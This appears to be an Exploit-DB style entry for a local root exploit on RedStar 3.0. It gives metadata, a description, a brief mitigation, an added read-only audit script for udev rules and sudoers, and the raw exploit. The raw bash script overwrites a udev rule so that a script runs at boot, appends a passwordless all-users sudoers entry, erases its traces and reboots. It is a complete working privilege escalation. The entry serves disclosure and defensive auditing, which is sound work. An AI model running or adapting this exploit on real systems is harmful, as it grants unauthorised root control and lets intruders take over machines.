Vendor: RedStar 3.0
By: HackerFantastic
CVSS: 7.8 (HIGH)
Privilege Escalation
CWE: 264
Product Name: RedStar 3.0
Affected Version From: RedStar 3.0
Affected Version To: RedStar 3.0
Patch Exists: No
Related CWE: N/A
CPE: o:redstar:redstar_3.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2015

RedStar 3.0 Local Root Exploit

This exploit gains root access on RedStar 3.0 systems. It overwrites the udev rules file /etc/udev/rules.d/85-hplj10xx.rules with a malicious rule that runs a shell script, and that script adds a new entry to the sudoers file. After a reboot, the user can gain root access through sudo without a password.

Mitigation:

The user should ensure that the udev rules under /etc/udev/rules.d/ are not modified and that the /etc/sudoers file is not modified without authorization.
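
A read-only audit for the two conditions named in the mitigation above, as an added example that is not part of the original exploit or database entry. The function names and the sample files are constructed for illustration, and `find -perm /022` assumes GNU find.

```bash
#!/bin/bash
# Added example: read-only audit of udev rules and sudoers.
# Function names and the sample tree are constructed, not taken from the page.

# Print one finding per line for a udev rules directory:
#   WRITABLE <file>  rules file is group- or world-writable
#   TMPRUN   <file>  a RUN directive executes something under a world-writable dir
audit_udev_rules() {
    local dir=$1 f
    for f in "$dir"/*.rules; do
        [ -e "$f" ] || continue
        if [ -n "$(find "$f" -maxdepth 0 -perm /022 2>/dev/null)" ]; then
            echo "WRITABLE $f"
        fi
        if grep -Eq 'RUN(\{[a-z]+\})?[[:space:]]*\+?=.*(/tmp/|/var/tmp/|/dev/shm/)' "$f"; then
            echo "TMPRUN $f"
        fi
    done
}

# Print (with line numbers) sudoers lines that grant every user passwordless sudo.
audit_sudoers() {
    grep -En '^[[:space:]]*ALL[[:space:]]+ALL[[:space:]]*=.*NOPASSWD:[[:space:]]*ALL' "$1" || true
}

# Constructed sample tree so the audit can be exercised without touching /etc.
make_sample() {
    local root
    root=$(mktemp -d)
    mkdir -p "$root/rules.d"
    printf 'KERNEL=="lp*", GROUP="lp"\n' > "$root/rules.d/10-ok.rules"
    chmod 644 "$root/rules.d/10-ok.rules"
    printf 'RUN+="/bin/bash /tmp/r00t.sh"\n' > "$root/rules.d/85-hplj10xx.rules"
    chmod 777 "$root/rules.d/85-hplj10xx.rules"   # constructed mode for the sample
    printf 'root\tALL=(ALL)\tALL\nALL\tALL=(ALL)\tNOPASSWD: ALL\n' > "$root/sudoers"
    echo "$root"
}

# On a real system, run as root with both paths given explicitly:
#   ./audit.sh /etc/udev/rules.d /etc/sudoers
if [ "$#" -ge 2 ]; then
    audit_udev_rules "$1"
    audit_sudoers "$2"
fi
```

Any `WRITABLE` or `TMPRUN` line, or any output from `audit_sudoers`, should be treated as a finding to investigate.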

Exploit-DB raw data:

#!/bin/bash -e

## Alternative steps: https://pbs.twimg.com/media/B68inqBIQAA5sK6.png
## Proof: https://github.com/HackerFantastic/Public/blob/master/exploits/redstar3.0-localroot.png

cp /etc/udev/rules.d/85-hplj10xx.rules /tmp/udevhp.bak
echo 'RUN+="/bin/bash /tmp/r00t.sh"' > /etc/udev/rules.d/85-hplj10xx.rules
cat <<EOF >/tmp/r00t.sh
echo -e "ALL\tALL=(ALL)\tNOPASSWD: ALL" >> /etc/sudoers
mv /tmp/udevhp.bak /etc/udev/rules.d/85-hplj10xx.rules
chown 0:0 /etc/udev/rules.d/85-hplj10xx.rules
rm /tmp/r00t.sh
EOF
chmod +x /tmp/r00t.sh
echo "sudo will be available after reboot"
sleep 2
reboot

## Source: https://twitter.com/sfan55/status/550348619652796416 & http://www.openwall.com/lists/oss-security/2015/01/09/6